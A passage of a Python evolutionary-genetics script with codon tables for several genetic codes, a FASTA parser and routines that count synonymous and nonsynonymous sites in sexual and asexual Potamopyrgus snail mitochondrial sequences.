'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 
'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 
'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG'] # invertebrateMt start codons; any of these in first position is translated as M
seqDict,seqList = buildSeqDict(fasta)
codonDict = {}
AADict = {}
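# Split each nucleotide sequence into non-overlapping codons; a trailing partial
# codon (when the length is not a multiple of 3) is silently dropped.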
for seq in seqList:
nucleotideSeq = seqDict[seq]
codonList = []
i = 2
while i < len(nucleotideSeq):
currCodon = nucleotideSeq[i-2] + nucleotideSeq[i-1] + nucleotideSeq[i]
codonList.append(currCodon)
i += 3
codonDict[seq] = codonList
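# Translate the codon list: the first codon becomes 'M' if it is a valid start
# codon, codons containing 'N' or '-' become 'X', and a trailing stop ('*') is
# stripped. AADict is filled here but not returned.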
AAseq = ''
codonNum = 1
for codon in codonList:
if codonNum == 1 and 'N' not in codon and '-' not in codon:
if codon in startCodons:
aa = 'M'
else:
aa = geneticCode[codon]
elif 'N' not in codon and '-' not in codon:
aa = geneticCode[codon]
else:
aa = 'X'
AAseq += aa
codonNum += 1
if AAseq != '' and AAseq[-1] == '*': # drop the trailing stop codon; guard against empty translations
AAseq = AAseq[0:-1]
AADict[seq] = AAseq
return seqDict, seqList, codonDict
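# buildSeqDict: minimal FASTA parser; maps each header line (kept with its
# leading '>') to its concatenated sequence and records header order.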
def buildSeqDict(fasta):
infile = open(fasta,'r')
scaffoldDict = {}
scaffoldList = []
seqName = ''
currSeq = ''
for line in infile:
if line[0] == '>':
if seqName != '':
scaffoldDict[seqName] = currSeq
seqName = line.rstrip('\n\t\r')
scaffoldList.append(seqName)
currSeq = ''
else:
currSeq += line.rstrip('\n\t\r') # strip line endings as each line is read; safe on blank lines
scaffoldDict[seqName] = currSeq
infile.close()
return scaffoldDict, scaffoldList
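# meanSites: print the site counts for the P. estuarinus outgroup and, when the
# disabled block below is re-enabled, write per-group mean synonymous/nonsynonymous
# and conservative/radical site counts to sites.txt.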
def meanSites(fasta):
asexList = ['>$Duluth','>$Heron2','>$McGregor','>$Waik36','>$WalesC','>$clone_1','>$AC51','>$Heron_mitochondrion','>$clone_7','>$Waik37','>$Gunn','>$DenmarkA','>$Waik372','>$Tarawera','>$Poerua_triploid','>$Kaniere_triploid','>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237','>$Brunner_2_4n','>$Brunner_6_3n','>$Grasmere_1_4n','>$Grasmere_6_3n','>$Poerua_72_4n','>$Rotoiti_1_4n']
sexList = ['>$Kaniere_1_2n','>$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309','>$Yellow_Contig_56','>$Alexsex','>$AlexMap','>$Lady','>$Ianthe','>$Rotoroa_1_2n']
antipodarumList = ['>$Duluth','>$Heron2','>$McGregor','>$Waik36','>$WalesC','>$clone_1','>$AC51','>$Heron_mitochondrion','>$clone_7','>$Waik37','>$Gunn','>$DenmarkA','>$Waik372','>$Tarawera','>$Poerua_triploid','>$Kaniere_triploid','>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237','>$Brunner_2_4n','>$Brunner_6_3n','>$Grasmere_1_4n','>$Grasmere_6_3n','>$Poerua_72_4n','>$Rotoiti_1_4n','>$Kaniere_1_2n','>$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309','>$Yellow_Contig_56','>$Alexsex','>$AlexMap','>$Lady','>$Ianthe','>$Rotoroa_1_2n']
seqDict, seqList, codonDict = buildCodonDict(fasta)
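# Running totals: S/N = synonymous/nonsynonymous sites, meanC/meanR = mean
# conservative/radical sites, Ck/Rk = conservative/radical sites under scheme k;
# kept separately for sexual, asexual, and all P. antipodarum lineages.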
sexS = 0
sexN = 0
meanC = 0
meanR = 0
sexMeanC = 0
sexMeanR = 0
asexMeanC = 0
asexMeanR = 0
sexC1 = 0
sexR1 = 0
sexC2 = 0
sexR2 = 0
sexC3 = 0
sexR3 = 0
sexC4 = 0
sexR4 = 0
sexC5 = 0
sexR5 = 0
sexC6 = 0
sexR6 = 0
sexC7 = 0
sexR7 = 0
asexS = 0
asexN = 0
asexC1 = 0
asexR1 = 0
asexC2 = 0
asexR2 = 0
asexC3 = 0
asexR3 = 0
asexC4 = 0
asexR4 = 0
asexC5 = 0
asexR5 = 0
asexC6 = 0
asexR6 = 0
asexC7 = 0
asexR7 = 0
S = 0
N = 0
C1 = 0
R1 = 0
C2 = 0
R2 = 0
C3 = 0
R3 = 0
C4 = 0
R4 = 0
C5 = 0
R5 = 0
C6 = 0
R6 = 0
C7 = 0
R7 = 0
est = countSites(codonDict['>Potamopyrgus_estuarinus']) #[totalSynSites,totalNonsynSites,totalMeanCSites,totalMeanRSites,totalC1Sites,totalR1Sites,totalC2Sites,totalR2Sites,totalC3Sites,totalR3Sites,totalC4Sites,totalR4Sites,totalC5Sites,totalR5Sites,totalC6Sites,totalR6Sites,totalC7Sites,totalR7Sites]
estS = est[0]
estN = est[1]
estMeanC = est[2]
estMeanR = est[3]
estC1 = est[4]
estR1 = est[5]
estC2 = est[6]
estR2 = est[7]
estC3 = est[8]
estR3 = est[9]
estC4 = est[10]
estR4 = est[11]
estC5 = est[12]
estR5 = est[13]
estC6 = est[14]
estR6 = est[15]
estC7 = est[16]
estR7 = est[17]
for item in est:
sys.stdout.write(str(item) + '\t') # tab-separated on one line
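# NOTE: the triple-quoted block below (per-snail tallies and the sites.txt
# summary table) is currently disabled.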
'''outfile = open('sites.txt','w')
for snail in antipodarumList:
snailSites = countSites(codonDict[snail])#[totalSynSites,totalNonsynSites,totalMeanCSites,totalMeanRSites,totalC1Sites,totalR1Sites,totalC2Sites,totalR2Sites,totalC3Sites,totalR3Sites,totalC4Sites,totalR4Sites,totalC5Sites,totalR5Sites,totalC6Sites,totalR6Sites,totalC7Sites,totalR7Sites]
sys.stdout.write(snail)
for item in snailSites:
sys.stdout.write('\t' + str(item))
sys.stdout.write('\n')
S += snailSites[0]
N += snailSites[1]
C1 += snailSites[4]
R1 += snailSites[5]
C2 += snailSites[6]
R2 += snailSites[7]
C3 += snailSites[8]
R3 += snailSites[9]
C4 += snailSites[10]
R4 += snailSites[11]
C5 += snailSites[12]
R5 += snailSites[13]
C6 += snailSites[14]
R6 += snailSites[15]
C7 += snailSites[16]
R7 += snailSites[17]
meanC += snailSites[2]
meanR += snailSites[3]
if snail in sexList:
sexS += snailSites[0]
sexN += snailSites[1]
sexMeanC += snailSites[2]
sexMeanR += snailSites[3]
sexC1 += snailSites[4]
sexR1 += snailSites[5]
sexC2 += snailSites[6]
sexR2 += snailSites[7]
sexC3 += snailSites[8]
sexR3 += snailSites[9]
sexC4 += snailSites[10]
sexR4 += snailSites[11]
sexC5 += snailSites[12]
sexR5 += snailSites[13]
sexC6 += snailSites[14]
sexR6 += snailSites[15]
sexC7 += snailSites[16]
sexR7 += snailSites[17]
elif snail in asexList:
asexS += snailSites[0]
asexN += snailSites[1]
asexMeanC += snailSites[2]
asexMeanR += snailSites[3]
asexC1 += snailSites[4]
asexR1 += snailSites[5]
asexC2 += snailSites[6]
asexR2 += snailSites[7]
asexC3 += snailSites[8]
asexR3 += snailSites[9]
asexC4 += snailSites[10]
asexR4 += snailSites[11]
asexC5 += snailSites[12]
asexR5 += snailSites[13]
asexC6 += snailSites[14]
asexR6 += snailSites[15]
asexC7 += snailSites[16]
asexR7 += snailSites[17]
sexS /= len(sexList)
sexN /= len(sexList)
sexMeanC /= len(sexList)
sexMeanR /= len(sexList)
sexC1 /= len(sexList)
sexR1 /= len(sexList)
sexC2 /= len(sexList)
sexR2 /= len(sexList)
sexC3 /= len(sexList)
sexR3 /= len(sexList)
sexC4 /= len(sexList)
sexR4 /= len(sexList)
sexC5 /= len(sexList)
sexR5 /= len(sexList)
sexC6 /= len(sexList)
sexR6 /= len(sexList)
sexC7 /= len(sexList)
sexR7 /= len(sexList)
asexS /= len(asexList)
asexN /= len(asexList)
asexC1 /= len(asexList)
asexR1 /= len(asexList)
asexC2 /= len(asexList)
asexR2 /= len(asexList)
asexC3 /= len(asexList)
asexR3 /= len(asexList)
asexC4 /= len(asexList)
asexR4 /= len(asexList)
asexC5 /= len(asexList)
asexR5 /= len(asexList)
asexC6 /= len(asexList)
asexR6 /= len(asexList)
asexC7 /= len(asexList)
asexR7 /= len(asexList)
asexMeanC /= len(asexList)
asexMeanR /= len(asexList)
divS = (S + estS)/(len(antipodarumList) + 1)
divN = (N + estN)/(len(antipodarumList) + 1)
divMeanC = (meanC + estMeanC)/(len(antipodarumList) + 1)
divMeanR = (meanR + estMeanR)/(len(antipodarumList) + 1)
divC1 = (C1 + estC1)/(len(antipodarumList) + 1)
divR1 = (R1 + estR1)/(len(antipodarumList) + 1)
divC2 = (C2 + estC2)/(len(antipodarumList) + 1)
divR2 = (R2 + estR2)/(len(antipodarumList) + 1)
divC3 = (C3 + estC3)/(len(antipodarumList) + 1)
divR3 = (R3 + estR3)/(len(antipodarumList) + 1)
divC4 = (C4 + estC4)/(len(antipodarumList) + 1)
divR4 = (R4 + estR4)/(len(antipodarumList) + 1)
divC5 = (C5 + estC5)/(len(antipodarumList) + 1)
divR5 = (R5 + estR5)/(len(antipodarumList) + 1)
divC6 = (C6 + estC6)/(len(antipodarumList) + 1)
divR6 = (R6 + estR6)/(len(antipodarumList) + 1)
divC7 = (C7 + estC7)/(len(antipodarumList) + 1)
divR7 = (R7 + estR7)/(len(antipodarumList) + 1)
S /= len(antipodarumList)
N /= len(antipodarumList)
meanC /= len(antipodarumList)
meanR /= len(antipodarumList)
C1 /= len(antipodarumList)
R1 /= len(antipodarumList)
C2 /= len(antipodarumList)
R2 /= len(antipodarumList)
C3 /= len(antipodarumList)
R3 /= len(antipodarumList)
C4 /= len(antipodarumList)
R4 /= len(antipodarumList)
C5 /= len(antipodarumList)
R5 /= len(antipodarumList)
C6 /= len(antipodarumList)
R6 /= len(antipodarumList)
C7 /= len(antipodarumList)
R7 /= len(antipodarumList)
outfile.write('Group\tS\tN\tmeanC\tmeanR\tC1\tR1\tC2\tR2\tC3\tR3\tC4\tR4\tC5\tR5\tC6\tR6\tC7\tR7\nP.antipodarum-P.estuarinus\t' + str(divS) + '\t' + str(divN) + '\t' + str(divMeanC) + '\t' + str(divMeanR) + '\t' + str(divC1) + '\t' + str(divR1) + '\t' + str(divC2) + '\t' + str(divR2) + '\t' + str(divC3) + '\t' + str(divR3) + '\t' + str(divC4) + '\t' + str(divR4) + '\t' + str(divC5) + '\t' + str(divR5) + '\t' + str(divC6) + '\t' + str(divR6) + '\t' + str(divC7) + '\t' + str(divR7) + '\nP.antipodarum\t' + str(S) + '\t' + str(N) + '\t' + str(meanC) + '\t' + str(meanR) + '\t' + str(C1) + '\t' + str(R1) + '\t' + str(C2) + '\t' + str(R2) + '\t' + str(C3) + '\t' + str(R3) + '\t' + str(C4) + '\t' + str(R4) + '\t' + str(C5) + '\t' + str(R5) + '\t' + str(C6) + '\t' + str(R6) + '\t' + str(C7) + '\t' + str(R7) + '\nSex\t' + str(sexS) + '\t' + str(sexN) + '\t' + str(sexMeanC) + '\t' + str(sexMeanR) + '\t' + str(sexC1) + '\t' + str(sexR1) + '\t' + str(sexC2) + '\t' + str(sexR2) + '\t' + str(sexC3) + '\t' + str(sexR3) + '\t' + str(sexC4) + '\t' + str(sexR4) + '\t' + str(sexC5) + '\t' + str(sexR5) + '\t' + str(sexC6) + '\t' + str(sexR6) + '\t' + str(sexC7) + '\t' + str(sexR7) + '\nAsex\t' + str(asexS) + '\t' + str(asexN) + '\t' + str(asexMeanC) + '\t' + str(asexMeanR) + '\t' + str(asexC1) + '\t' + str(asexR1) + '\t' + str(asexC2) + '\t' + str(asexR2) + '\t' + str(asexC3) + '\t' + str(asexR3) + '\t' + str(asexC4) + '\t' + str(asexR4) + '\t' + str(asexC5) + '\t' + str(asexR5) + '\t' + str(asexC6) + '\t' + str(asexR6) + '\t' + str(asexC7) + '\t' + str(asexR7) + '\n')
outfile.close()'''
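# countSites: tally site totals for one codon list; returns [synSites,
# nonsynSites, meanCSites, meanRSites, C1, R1, C2, R2, ..., C7, R7].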
def countSites(codonList):
code = 'invertebrateMt'
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 
'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 